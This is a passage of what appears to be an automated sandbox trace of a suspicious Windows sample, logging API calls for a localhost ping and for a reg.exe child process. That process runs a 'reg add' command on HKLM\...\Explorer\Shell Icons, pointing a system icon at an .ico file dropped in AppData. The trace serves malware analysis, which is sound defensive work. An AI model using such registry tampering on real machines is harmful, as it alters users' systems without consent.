(in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xcf4b4 | out: phkResult=0xcf4b4*=0x58) returned 0x0 [0116.389] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xcf4a8, lpData=0xcf4b0, lpcbData=0xcf4ac*=0x4 | out: lpType=0xcf4a8*=0x0, lpData=0xcf4b0*=0x0, lpcbData=0xcf4ac*=0x4) returned 0x2 [0116.389] RegCloseKey (hKey=0x58) returned 0x0 [0116.389] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xcf47c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcf4a4 | out: ppResult=0xcf4a4*=0x0) returned 11001 [0116.389] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xcf47c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcf4a4 | out: ppResult=0xcf4a4*=0x3546f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x3547b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3547e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x353a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0116.730] FreeAddrInfoW (pAddrInfo=0x3546f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x3547b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3547e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x353a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0116.730] Icmp6CreateFile () returned 0x358b40 [0116.899] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x354830 [0116.899] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x35ebb0 [0116.899] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf9a4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0116.900] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xcf4a4, nSize=0x0, Arguments=0xcf4a0 | out: lpBuffer="XH5") returned 0x19 [0116.900] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x354858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0116.900] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.900] _write (in: _FileHandle=1, _Buf=0x354858*, _MaxCharCount=0x19 | out: _Buf=0x354858*) returned 25 [0116.900] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.900] LocalFree (hMem=0x354858) returned 0x0 [0116.900] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xcf4a8, nSize=0x0, Arguments=0xcf4a4 | out: lpBuffer="XH5") returned 0x18 [0116.900] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x354858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0116.900] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.900] _write (in: _FileHandle=1, _Buf=0x354858*, _MaxCharCount=0x18 | out: _Buf=0x354858*) returned 24 [0116.901] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.901] LocalFree (hMem=0x354858) returned 0x0 [0116.901] SetConsoleCtrlHandler (HandlerRoutine=0x2417ca, Add=1) returned 1 [0116.901] Icmp6SendEcho2 (in: IcmpHandle=0x358b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf520, DestinationAddress=0x2455e0, RequestData=0x354830, RequestSize=0x20, RequestOptions=0xcf4d0, ReplyBuffer=0x35ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x35ebb0) returned 0x1 [0116.908] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf9a4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0116.908] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf4a8, nSize=0x0, Arguments=0xcf4a4 | out: lpBuffer=" Q5") returned 0x10 [0116.908] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x355120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0116.908] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.908] _write (in: _FileHandle=1, _Buf=0x355120*, _MaxCharCount=0x10 | out: _Buf=0x355120*) returned 16 [0116.908] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.908] LocalFree (hMem=0x355120) returned 0x0 [0116.908] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer="\x10<5") returned 0x9 [0116.908] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x353c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0116.908] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.909] _write (in: _FileHandle=1, _Buf=0x353c10*, _MaxCharCount=0x9 | out: _Buf=0x353c10*) returned 9 [0116.909] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.909] LocalFree (hMem=0x353c10) returned 0x0 [0116.909] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer=" \x8f5") returned 0x2 [0116.909] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x358f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0116.909] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0116.909] _write (in: _FileHandle=1, _Buf=0x358f20*, _MaxCharCount=0x2 | out: _Buf=0x358f20*) returned 2 [0116.909] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0116.909] LocalFree (hMem=0x358f20) returned 0x0 [0116.909] Sleep (dwMilliseconds=0x3e8) [0118.178] Icmp6SendEcho2 (in: IcmpHandle=0x358b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf520, DestinationAddress=0x2455e0, RequestData=0x354830, RequestSize=0x20, RequestOptions=0xcf4d0, ReplyBuffer=0x35ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x35ebb0) returned 0x1 [0118.589] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf9a4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.589] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf4a8, nSize=0x0, Arguments=0xcf4a4 | out: lpBuffer=" Q5") returned 0x10 [0118.589] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x355120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0118.589] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.589] _write (in: _FileHandle=1, _Buf=0x355120*, _MaxCharCount=0x10 | out: _Buf=0x355120*) returned 16 [0118.589] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.589] LocalFree (hMem=0x355120) returned 0x0 [0118.589] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer="\x10<5") returned 0x9 [0118.590] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x353c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0118.590] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.590] _write (in: _FileHandle=1, _Buf=0x353c10*, _MaxCharCount=0x9 | out: _Buf=0x353c10*) returned 9 [0118.590] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.590] LocalFree (hMem=0x353c10) returned 0x0 [0118.590] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer=" \x8f5") returned 0x2 [0118.590] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x358f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0118.590] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.590] _write (in: _FileHandle=1, _Buf=0x358f20*, _MaxCharCount=0x2 | out: _Buf=0x358f20*) returned 2 [0118.590] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.590] LocalFree (hMem=0x358f20) returned 0x0 [0118.590] Sleep (dwMilliseconds=0x3e8) [0119.786] Icmp6SendEcho2 (in: IcmpHandle=0x358b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf520, DestinationAddress=0x2455e0, RequestData=0x354830, RequestSize=0x20, RequestOptions=0xcf4d0, ReplyBuffer=0x35ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x35ebb0) returned 0x1 [0119.851] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf9a4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.851] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf4a8, nSize=0x0, Arguments=0xcf4a4 | out: lpBuffer=" Q5") returned 0x10 [0119.851] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x355120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0119.851] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.851] _write (in: _FileHandle=1, _Buf=0x355120*, _MaxCharCount=0x10 | out: _Buf=0x355120*) returned 16 [0119.851] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.851] LocalFree (hMem=0x355120) returned 0x0 [0119.851] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer="\x10<5") returned 0x9 [0119.851] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x353c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0119.851] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.851] _write (in: _FileHandle=1, _Buf=0x353c10*, _MaxCharCount=0x9 | out: _Buf=0x353c10*) returned 9 [0119.851] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.851] LocalFree (hMem=0x353c10) returned 0x0 [0119.851] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf4ac, nSize=0x0, Arguments=0xcf4a8 | out: lpBuffer=" \x8f5") returned 0x2 [0119.852] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x358f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0119.852] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.852] _write (in: _FileHandle=1, _Buf=0x358f20*, _MaxCharCount=0x2 | out: _Buf=0x358f20*) returned 2 [0119.852] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.852] LocalFree (hMem=0x358f20) returned 0x0 [0119.852] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf470, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.852] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xcf440, nSize=0x0, Arguments=0xcf43c | out: lpBuffer="\xd0\x14\x36") returned 0x56 [0119.852] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x3614d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0119.852] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.852] _write (in: _FileHandle=1, _Buf=0x3614d0*, _MaxCharCount=0x56 | out: _Buf=0x3614d0*) returned 86 [0119.852] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.852] LocalFree (hMem=0x3614d0) returned 0x0 [0119.853] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xcf450, nSize=0x0, Arguments=0xcf44c | out: lpBuffer="\xe8\x14\x36") returned 0x61 [0119.853] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x3614e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0119.853] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.853] _write (in: _FileHandle=1, _Buf=0x3614e8*, _MaxCharCount=0x61 | out: _Buf=0x3614e8*) returned 97 [0119.853] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.853] LocalFree (hMem=0x3614e8) returned 0x0 [0119.853] IcmpCloseHandle (IcmpHandle=0x358b40) returned 1 [0119.933] LocalFree (hMem=0x354830) returned 0x0 [0119.933] LocalFree (hMem=0x35ebb0) returned 0x0 [0119.933] WSACleanup () returned 0 [0119.973] exit (_Code=0) Thread: id = 89 os_tid = 0xe50 Thread: id = 92 os_tid = 0xe68 Thread: id = 95 os_tid = 0xe78 Process: id = "56" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x7ea166c0" os_pid = "0xe48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0xd8c" cmd_line = "reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8288 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8289 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8290 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8291 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8292 start_va = 0xf70000 end_va = 0xfc1fff entry_point = 0xf70000 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 8293 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8294 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8295 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8296 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 8297 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8299 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8300 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8301 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 8302 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 8303 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8304 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8305 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8306 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8307 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8308 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8309 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8310 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8311 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8312 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8313 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8314 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8315 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8316 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8317 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 8318 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8319 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8320 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8321 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 8322 start_va = 0x120000 end_va = 0x128fff entry_point = 0x120000 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\System32\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\reg.exe.mui") Region: id = 8323 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8324 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 8325 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 8326 start_va = 0xfd0000 end_va = 0x1bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 8327 start_va = 0x4f0000 end_va = 0x7befff entry_point = 0x4f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8413 start_va = 0x7c0000 end_va = 0x87ffff entry_point = 0x7c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 88 os_tid = 0xe4c [0116.535] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fa6c | out: lpSystemTimeAsFileTime=0x10fa6c*(dwLowDateTime=0x82c4a8a0, dwHighDateTime=0x1d440a9)) [0116.535] GetCurrentProcessId () returned 0xe48 [0116.535] GetCurrentThreadId () returned 0xe4c [0116.535] GetTickCount () returned 0x27a3d [0116.535] QueryPerformanceCounter (in: lpPerformanceCount=0x10fa64 | out: lpPerformanceCount=0x10fa64*=17332471377) returned 1 [0116.536] GetModuleHandleA (lpModuleName=0x0) returned 0xf70000 [0116.536] __set_app_type (_Type=0x1) [0116.536] __p__fmode () returned 0x76b331f4 [0116.536] __p__commode () returned 0x76b331fc [0116.536] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf7d4f9) returned 0x0 [0116.536] __wgetmainargs (in: _Argc=0xf7f030, _Argv=0xf7f038, _Env=0xf7f034, _DoWildCard=0, _StartInfo=0xf7f010 | out: _Argc=0xf7f030, _Argv=0xf7f038, _Env=0xf7f034) returned 0 [0116.537] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0116.538] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0116.538] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x10f9ec | out: phkResult=0x10f9ec*=0x0) returned 0x2 [0116.538] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0116.538] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0116.538] lstrlenW (lpString="") returned 0 [0116.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.553] _memicmp (_Buf1=0x2ee300, _Buf2=0xf71318, _Size=0x7) returned 0 [0116.553] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.553] _memicmp (_Buf1=0x2ee318, _Buf2=0xf71318, _Size=0x7) returned 0 [0116.554] _vsnwprintf (in: _Buffer=0x2f1060, _BufferCount=0xe, _Format="|%s|", _ArgList=0x10f908 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0116.554] _vsnwprintf (in: _Buffer=0x2f21a0, _BufferCount=0x46, _Format="|%s|", _ArgList=0x10f908 | out: _Buffer="|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons|") returned 69 [0116.554] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0116.554] lstrlenW (lpString="|HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons|") returned 69 [0116.554] SetLastError (dwErrCode=0x490) [0116.554] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.554] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", 